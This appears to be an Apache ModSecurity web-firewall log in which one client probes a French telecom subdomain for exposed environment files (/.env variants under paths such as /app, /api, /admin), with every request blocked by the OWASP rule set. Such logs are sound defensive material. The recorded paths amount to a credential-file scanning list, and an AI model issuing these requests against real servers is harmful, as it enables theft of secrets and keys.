[Mon May 11 17:22:41.159005 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env2"] [unique_id "agH0QUWKUxpmnkK7zHySLQAAAQs"]
[Mon May 11 17:22:41.159554 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env2"] [unique_id "agH0QUWKUxpmnkK7zHySLQAAAQs"]
[Mon May 11 17:22:41.159814 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env2"] [unique_id "agH0QUWKUxpmnkK7zHySLQAAAQs"]
[Mon May 11 17:22:41.320932 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env_copy"] [unique_id "agH0QUWKUxpmnkK7zHySLgAAAQs"]
[Mon May 11 17:22:41.321368 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env_copy"] [unique_id "agH0QUWKUxpmnkK7zHySLgAAAQs"]
[Mon May 11 17:22:41.321594 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env_copy"] [unique_id "agH0QUWKUxpmnkK7zHySLgAAAQs"]
[Mon May 11 17:22:41.483557 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.txt"] [unique_id "agH0QUWKUxpmnkK7zHySLwAAAQs"]
[Mon May 11 17:22:41.484105 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.txt"] [unique_id "agH0QUWKUxpmnkK7zHySLwAAAQs"]
[Mon May 11 17:22:41.484381 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.txt"] [unique_id "agH0QUWKUxpmnkK7zHySLwAAAQs"]
[Mon May 11 17:22:41.646566 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.json"] [unique_id "agH0QUWKUxpmnkK7zHySMAAAAQs"]
[Mon May 11 17:22:41.647040 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.json"] [unique_id "agH0QUWKUxpmnkK7zHySMAAAAQs"]
[Mon May 11 17:22:41.647302 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.json"] [unique_id "agH0QUWKUxpmnkK7zHySMAAAAQs"]
[Mon May 11 17:22:41.808868 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.yaml"] [unique_id "agH0QUWKUxpmnkK7zHySMQAAAQs"]
[Mon May 11 17:22:41.809372 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.yaml"] [unique_id "agH0QUWKUxpmnkK7zHySMQAAAQs"]
[Mon May 11 17:22:41.809609 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.yaml"] [unique_id "agH0QUWKUxpmnkK7zHySMQAAAQs"]
[Mon May 11 17:22:41.974046 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.yml"] [unique_id "agH0QUWKUxpmnkK7zHySMgAAAQs"]
[Mon May 11 17:22:41.974549 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.yml"] [unique_id "agH0QUWKUxpmnkK7zHySMgAAAQs"]
[Mon May 11 17:22:41.974780 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/.env.yml"] [unique_id "agH0QUWKUxpmnkK7zHySMgAAAQs"]
[Mon May 11 17:22:42.136118 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agH0QkWKUxpmnkK7zHySNAAAAQs"]
[Mon May 11 17:22:42.136594 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agH0QkWKUxpmnkK7zHySNAAAAQs"]
[Mon May 11 17:22:42.136826 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agH0QkWKUxpmnkK7zHySNAAAAQs"]
[Mon May 11 17:22:42.299119 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agH0QkWKUxpmnkK7zHySNQAAAQs"]
[Mon May 11 17:22:42.299635 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agH0QkWKUxpmnkK7zHySNQAAAQs"]
[Mon May 11 17:22:42.299882 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agH0QkWKUxpmnkK7zHySNQAAAQs"]
[Mon May 11 17:22:42.461339 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agH0QkWKUxpmnkK7zHySNgAAAQs"]
[Mon May 11 17:22:42.461826 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agH0QkWKUxpmnkK7zHySNgAAAQs"]
[Mon May 11 17:22:42.462081 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/.env"] [unique_id "agH0QkWKUxpmnkK7zHySNgAAAQs"]
[Mon May 11 17:22:42.624476 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agH0QkWKUxpmnkK7zHySNwAAAQs"]
[Mon May 11 17:22:42.624958 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agH0QkWKUxpmnkK7zHySNwAAAQs"]
[Mon May 11 17:22:42.625225 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/web/.env"] [unique_id "agH0QkWKUxpmnkK7zHySNwAAAQs"]
[Mon May 11 17:22:42.798100 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/site/.env"] [unique_id "agH0QkWKUxpmnkK7zHySOAAAAQs"]
[Mon May 11 17:22:42.798613 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/site/.env"] [unique_id "agH0QkWKUxpmnkK7zHySOAAAAQs"]
[Mon May 11 17:22:42.798871 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/site/.env"] [unique_id "agH0QkWKUxpmnkK7zHySOAAAAQs"]
[Mon May 11 17:22:42.960709 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agH0QkWKUxpmnkK7zHySOQAAAQs"]
[Mon May 11 17:22:42.961202 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agH0QkWKUxpmnkK7zHySOQAAAQs"]
[Mon May 11 17:22:42.961443 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/public/.env"] [unique_id "agH0QkWKUxpmnkK7zHySOQAAAQs"]
[Mon May 11 17:22:43.123242 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySOgAAAQs"]
[Mon May 11 17:22:43.123734 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySOgAAAQs"]
[Mon May 11 17:22:43.123979 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/admin/.env"] [unique_id "agH0Q0WKUxpmnkK7zHySOgAAAQs"]
